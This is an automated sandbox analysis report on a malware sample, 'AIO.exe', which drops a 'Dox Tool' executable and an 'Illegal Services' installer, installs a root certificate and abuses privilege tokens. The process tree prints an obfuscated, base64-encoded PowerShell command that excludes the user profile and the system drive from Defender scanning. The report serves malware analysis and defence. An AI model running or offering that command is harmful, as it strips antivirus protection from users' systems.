aa2bc6bdab3c1cd9cc94e92a00f2501ffd6bef384e69e605b9533ee4a9af2fcc

Resubmissions

25-12-2024 11:40

241225-ns1f3ssmct 10

20-06-2024 01:12

240620-bk1qnavdrk 10

01-06-2024 22:28

240601-2d43lsgh7s 10

Analysis

max time kernel
122s
max time network
126s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
01-06-2024 22:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Court Project V1.1/AIO.exe
Size

17.7MB
MD5

401a1cbd5e2b10c3e4f167dc1f7bb4f1
SHA1

ad74dfb0cb89794f0f13a21f35644ad51eab6ba7
SHA256

22e7c140c849ad87f0d9f9624374045712c8a2f4c38befa85a92330fe2382316
SHA512

df58e49d75dfe0b46057486d1117c422ff77d4b64d5bf4a14e0b9772600091b19d743793fdd7fc2e3031dc72cb6f50e0f1077cae3040a1dec9f5fe8df3464e8d
SSDEEP

393216:kMr/sMzD1BTFAj8ItCGsm37tPIHHlWlf3TD:kWk0pBTFADzOnlM

Score

7^/10

execution

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2356	Dox Tool V2.exe
2272	IS.Setup.exe

Loads dropped DLL 9 IoCs

pid	Process
1148	AIO.exe
1148	AIO.exe
1148	AIO.exe
2272	IS.Setup.exe
2272	IS.Setup.exe
1808	MsiExec.exe
1808	MsiExec.exe
1808	MsiExec.exe
1808	MsiExec.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\A:	IS.Setup.exe
File opened (read-only)	\??\L:	IS.Setup.exe
File opened (read-only)	\??\R:	IS.Setup.exe
File opened (read-only)	\??\Z:	IS.Setup.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	IS.Setup.exe
File opened (read-only)	\??\X:	IS.Setup.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\V:	IS.Setup.exe
File opened (read-only)	\??\Y:	IS.Setup.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\K:	IS.Setup.exe
File opened (read-only)	\??\T:	IS.Setup.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\H:	IS.Setup.exe
File opened (read-only)	\??\N:	IS.Setup.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	IS.Setup.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\E:	IS.Setup.exe
File opened (read-only)	\??\J:	IS.Setup.exe
File opened (read-only)	\??\P:	IS.Setup.exe
File opened (read-only)	\??\Q:	IS.Setup.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\S:	IS.Setup.exe
File opened (read-only)	\??\U:	IS.Setup.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\G:	IS.Setup.exe
File opened (read-only)	\??\I:	IS.Setup.exe
File opened (read-only)	\??\M:	IS.Setup.exe
File opened (read-only)	\??\O:	IS.Setup.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2268	powershell.exe
1256	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	IS.Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	IS.Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	IS.Setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	IS.Setup.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1256	powershell.exe
2268	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeRestorePrivilege	812	msiexec.exe
Token: SeTakeOwnershipPrivilege	812	msiexec.exe
Token: SeSecurityPrivilege	812	msiexec.exe
Token: SeCreateTokenPrivilege	2272	IS.Setup.exe
Token: SeAssignPrimaryTokenPrivilege	2272	IS.Setup.exe
Token: SeLockMemoryPrivilege	2272	IS.Setup.exe
Token: SeIncreaseQuotaPrivilege	2272	IS.Setup.exe
Token: SeMachineAccountPrivilege	2272	IS.Setup.exe
Token: SeTcbPrivilege	2272	IS.Setup.exe
Token: SeSecurityPrivilege	2272	IS.Setup.exe
Token: SeTakeOwnershipPrivilege	2272	IS.Setup.exe
Token: SeLoadDriverPrivilege	2272	IS.Setup.exe
Token: SeSystemProfilePrivilege	2272	IS.Setup.exe
Token: SeSystemtimePrivilege	2272	IS.Setup.exe
Token: SeProfSingleProcessPrivilege	2272	IS.Setup.exe
Token: SeIncBasePriorityPrivilege	2272	IS.Setup.exe
Token: SeCreatePagefilePrivilege	2272	IS.Setup.exe
Token: SeCreatePermanentPrivilege	2272	IS.Setup.exe
Token: SeBackupPrivilege	2272	IS.Setup.exe
Token: SeRestorePrivilege	2272	IS.Setup.exe
Token: SeShutdownPrivilege	2272	IS.Setup.exe
Token: SeDebugPrivilege	2272	IS.Setup.exe
Token: SeAuditPrivilege	2272	IS.Setup.exe
Token: SeSystemEnvironmentPrivilege	2272	IS.Setup.exe
Token: SeChangeNotifyPrivilege	2272	IS.Setup.exe
Token: SeRemoteShutdownPrivilege	2272	IS.Setup.exe
Token: SeUndockPrivilege	2272	IS.Setup.exe
Token: SeSyncAgentPrivilege	2272	IS.Setup.exe
Token: SeEnableDelegationPrivilege	2272	IS.Setup.exe
Token: SeManageVolumePrivilege	2272	IS.Setup.exe
Token: SeImpersonatePrivilege	2272	IS.Setup.exe
Token: SeCreateGlobalPrivilege	2272	IS.Setup.exe
Token: SeCreateTokenPrivilege	2272	IS.Setup.exe
Token: SeAssignPrimaryTokenPrivilege	2272	IS.Setup.exe
Token: SeLockMemoryPrivilege	2272	IS.Setup.exe
Token: SeIncreaseQuotaPrivilege	2272	IS.Setup.exe
Token: SeMachineAccountPrivilege	2272	IS.Setup.exe
Token: SeTcbPrivilege	2272	IS.Setup.exe
Token: SeSecurityPrivilege	2272	IS.Setup.exe
Token: SeTakeOwnershipPrivilege	2272	IS.Setup.exe
Token: SeLoadDriverPrivilege	2272	IS.Setup.exe
Token: SeSystemProfilePrivilege	2272	IS.Setup.exe
Token: SeSystemtimePrivilege	2272	IS.Setup.exe
Token: SeProfSingleProcessPrivilege	2272	IS.Setup.exe
Token: SeIncBasePriorityPrivilege	2272	IS.Setup.exe
Token: SeCreatePagefilePrivilege	2272	IS.Setup.exe
Token: SeCreatePermanentPrivilege	2272	IS.Setup.exe
Token: SeBackupPrivilege	2272	IS.Setup.exe
Token: SeRestorePrivilege	2272	IS.Setup.exe
Token: SeShutdownPrivilege	2272	IS.Setup.exe
Token: SeDebugPrivilege	2272	IS.Setup.exe
Token: SeAuditPrivilege	2272	IS.Setup.exe
Token: SeSystemEnvironmentPrivilege	2272	IS.Setup.exe
Token: SeChangeNotifyPrivilege	2272	IS.Setup.exe
Token: SeRemoteShutdownPrivilege	2272	IS.Setup.exe
Token: SeUndockPrivilege	2272	IS.Setup.exe
Token: SeSyncAgentPrivilege	2272	IS.Setup.exe
Token: SeEnableDelegationPrivilege	2272	IS.Setup.exe
Token: SeManageVolumePrivilege	2272	IS.Setup.exe
Token: SeImpersonatePrivilege	2272	IS.Setup.exe
Token: SeCreateGlobalPrivilege	2272	IS.Setup.exe
Token: SeCreateTokenPrivilege	2272	IS.Setup.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2272	IS.Setup.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 1148 wrote to memory of 2268	1148	AIO.exe	28
PID 1148 wrote to memory of 2268	1148	AIO.exe	28
PID 1148 wrote to memory of 2268	1148	AIO.exe	28
PID 1148 wrote to memory of 2268	1148	AIO.exe	28
PID 1148 wrote to memory of 1256	1148	AIO.exe	30
PID 1148 wrote to memory of 1256	1148	AIO.exe	30
PID 1148 wrote to memory of 1256	1148	AIO.exe	30
PID 1148 wrote to memory of 1256	1148	AIO.exe	30
PID 1148 wrote to memory of 2356	1148	AIO.exe	32
PID 1148 wrote to memory of 2356	1148	AIO.exe	32
PID 1148 wrote to memory of 2356	1148	AIO.exe	32
PID 1148 wrote to memory of 2356	1148	AIO.exe	32
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 1148 wrote to memory of 2272	1148	AIO.exe	33
PID 812 wrote to memory of 1808	812	msiexec.exe	35
PID 812 wrote to memory of 1808	812	msiexec.exe	35
PID 812 wrote to memory of 1808	812	msiexec.exe	35
PID 812 wrote to memory of 1808	812	msiexec.exe	35
PID 812 wrote to memory of 1808	812	msiexec.exe	35
PID 812 wrote to memory of 1808	812	msiexec.exe	35
PID 812 wrote to memory of 1808	812	msiexec.exe	35

C:\Users\Admin\AppData\Local\Temp\Court Project V1.1\AIO.exe
"C:\Users\Admin\AppData\Local\Temp\Court Project V1.1\AIO.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1148
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAcgBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHYAZQB0ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBmACAAbgBvAHQAIABlAHYAZQByAHkAdABoAGkAbgBnACAAVwBvAHIAawBzACAAUAByAG8AcABlAHIAbAB5ACAASQBuAHMAdABhAGwAbAAgAFAAeQB0AGgAbwBuACcALAAnACcALAAnAE8ASwAnACwAJwBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AJwApADwAIwBwAHQAdAAjAD4A"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2268
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbQBwACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AZwB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAZQB5ACMAPgA="
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1256
- C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe
  "C:\Users\Admin\AppData\Local\Temp\Dox Tool V2.exe"
  2⤵
  - Executes dropped EXE
  PID:2356
- C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe
  "C:\Users\Admin\AppData\Local\Temp\IS.Setup.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Enumerates connected drives
  - Modifies system certificate store
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:2272

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:812
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A7C951915E9FDC855DBB548E02817489 C
  2⤵
  - Loads dropped DLL
  PID:1808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\PrepareDlgProgress.gif

Filesize
24KB

MD5
f550f449baed1315c7965bd826c2510b

SHA1
772e6e82765dcfda319a68380981d77b83a3ab1b

SHA256
0ee7650c7faf97126ddbc7d21812e093af4f2317f3edcff16d2d6137d3c0544d

SHA512
7608140bc2d83f509a2afdaacd394d0aa5a6f7816e96c11f4218e815c3aaabf9fc95dd3b3a44b165334772ebdab7dfa585833850db09442743e56b8e505f6a09

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\backgroundprepare

Filesize
134B

MD5
a0efb0e7b9cee25b09e09a1a64e96ba6

SHA1
0c1e18f6f5e6e5e6953e9fb99ca60fdec35d6e39

SHA256
f044f542bc46464054084c63596877f06c6e2c215c0e954c4ace9787ced82787

SHA512
7e53f9f564aaa529b3b15035671957c2923ec98ddee93758ea7a4c8645ee9058962078771b853e3490290fde1f57030dff5092d40d69418776ffee89f79c8a7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\checkbox

Filesize
1KB

MD5
0b044ccde7aa9d86e02a94030d744ac2

SHA1
0594ebb3737536703907ba5672ccd351c6afb98a

SHA256
bce5b6de3a1c7af7ec14b6643da25f7c9e15bd5f1c4a38abfcddc70a5e93bdd3

SHA512
dbfba793722589f1a76dbc75c9a2f3646733e4a079a6b70003716a7f7b8fa1a6a2b234ec9132f5737e91d20d460db1e29826b2d7ac740f73136975f19e336cd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_bottom_left.bmp

Filesize
66B

MD5
1fb3755fe9676fca35b8d3c6a8e80b45

SHA1
7c60375472c2757650afbe045c1c97059ca66884

SHA256
384ebd5800becadf3bd9014686e6cc09344f75ce426e966d788eb5473b28aa21

SHA512
dee9db50320a27de65581c20d9e6cf429921ebee9d4e1190c044cc6063d217ca89f5667dc0d93faf7dcc2d931fe4e85c025c6f71c1651cbd2d12a43f915932c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_bottom_mid.bmp

Filesize
66B

MD5
71fa2730c42ae45c8b373053cc504731

SHA1
ef523fc56f6566fbc41c7d51d29943e6be976d5e

SHA256
205209facdebf400319dbcb1020f0545d7564b9415c47497528593e344795afd

SHA512
ea4415619720cc1d9fb1bb89a14903bfd1471b89f9c4847df4839084aae573d49b4969d3799ad30ff25b71f6e31f8d9f30701e1240d3cd6a063819c04873f21f

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_caption.bmp

Filesize
206B

MD5
8641f45594b8d413bf1da25ce59f1207

SHA1
afebb23f5a55d304d028ca9942526b3649cddb52

SHA256
0403ed31d75dcc182dd98f2b603da4c36b6325e9d159cac4371e1448244bb707

SHA512
86a5f959f8462f866466dc706d3ae627b1fb019b8a33ee7fe48e3b69f92bf33dc0f1417c0d5116552b25b488bcb5d9050a33773e6883ebe08410267d95b2353a

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_left.bmp

Filesize
66B

MD5
30384472ae83ff8a7336b987292d8349

SHA1
85d3e6cffe47f5a0a4e1a87ac9da729537783cd0

SHA256
f545ec56bc9b690a6b952471669a8316e18274d64e2ebc9e365fcf44363a125a

SHA512
7611f930a0a1089cc5004203ec128c916f0c2aedae3a6fcc2eaffa8cd004dcbf154714e401947921a06896ca77c77daec7f9bda82369aacd3bb666f8a0331963

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_left_inactive.bmp

Filesize
66B

MD5
4b84f29fbce81aab5af97a311d0e51e2

SHA1
60723cf4b91c139661db5ecb0964deca1fc196ea

SHA256
c93be5a7c979c534274fc1a965d26c126efa5d58c14066b14937e5aba3b9eb55

SHA512
775eadccc44fddbd1e0d4231bc90d222f0a9749199e1963449ad20285ea92941a5685cdc12c0cd8c0ef0a21e10bdacaf139e5c69cd5e402cc110679323c23df1

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_top_left.bmp

Filesize
154B

MD5
1966f4308086a013b8837dddf88f67ad

SHA1
1b66c1b1ad519cad2a273e2e5b2cfd77b8e3a190

SHA256
17b5cd496d98db14e7c9757e38892883c7b378407e1f136889a9921abe040741

SHA512
ec50f92b77bca5117a9a262ba1951e37d6139b838099e1546ab2716c7bafb0fc542ce7f1993a19591c832384df01b722d87bb5a6a010091fc880de6e5cfa6c17

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\frame_top_mid.bmp

Filesize
66B

MD5
4e0ac65606b6aacd85e11c470ceb4e54

SHA1
3f321e3bbde641b7733b806b9ef262243fb8af3b

SHA256
1d59fe11b3f1951c104f279c1338fc307940268971d016ebe929a9998a5038ee

SHA512
7b28bcb4e76af3b863a7c3390b6cd3316c4631434e1d1e2df8d6e0eb9987a61a4f1a24de59567394e346d45e332403a0817ed0b0b64d7a624dbe48e30db9bb64

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\iconnnn.jpg

Filesize
60KB

MD5
4938b81c37711b169c3416f312939df3

SHA1
0fa44cb363ee08e0850d6bbc7aaa7164a0f9050c

SHA256
cd60622e290ff56e44e29d7ddc005dcefa70a7efda24a7e0075587d5039ad710

SHA512
fd69aadc8502ac3ace5f937b7b7f38bf70cc1b89baaf9826713d5061f993cd593683227d5110e040fddd5d02fa3a993c6d128949025ce85cb61978cc3b40484d

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\metrobuttonimage

Filesize
404B

MD5
17368ff7073a6c7c2949d9a8eb743729

SHA1
d770cd409cf1a95908d26a51be8c646cace83e4c

SHA256
16e6e7662f3a204061c18090a64a8679f10bc408be802abd2c7c0e9fe865cbb4

SHA512
cbc3a378335f131d0146e5fe40cea38a741a0754a26304daebfda6f82c394cf0e151654782c6c8c7bbf7c354fcb72a2c66a77a87df528c2a3fa87c88f204059d

Download Submit
C:\Users\Admin\AppData\Local\Temp\AI_EXTUI_BIN_2272\sys_close_normal.png

Filesize
225B

MD5
8ba33e929eb0c016036968b6f137c5fa

SHA1
b563d786bddd6f1c30924da25b71891696346e15

SHA256
bbcac1632131b21d40c80ff9e14156d36366d2e7bb05eed584e9d448497152d5

SHA512
ba3a70757bd0db308e689a56e2f359c4356c5a7dd9e2831f4162ea04381d4bbdbef6335d97a2c55f588c7172e1c2ebf7a3bd481d30871f05e61eea17246a958e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab231C.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\IB_U_Z_Z_A_R_Dl\Illegal Services 6.1\install\707E587\IS.Setup.msi

Filesize
3.0MB

MD5
3255708b6cb705fe525f8b9fcc8b939a

SHA1
d3dec4db2c07e82c636e7c2b20f08accf2e6489c

SHA256
ff3e5b0baad11d798c2152eb01cdcf68775c123ac07f72cffb53b623ac9a71c5

SHA512
205bd7957a161c4c42ed2ce778378cfa81215a92a947f5ebca9327681cca60aa47ff5167a6afee8a49f1cc853c30bdf90f912e131d25891ef8fa1f34463e2b90

Download Submit
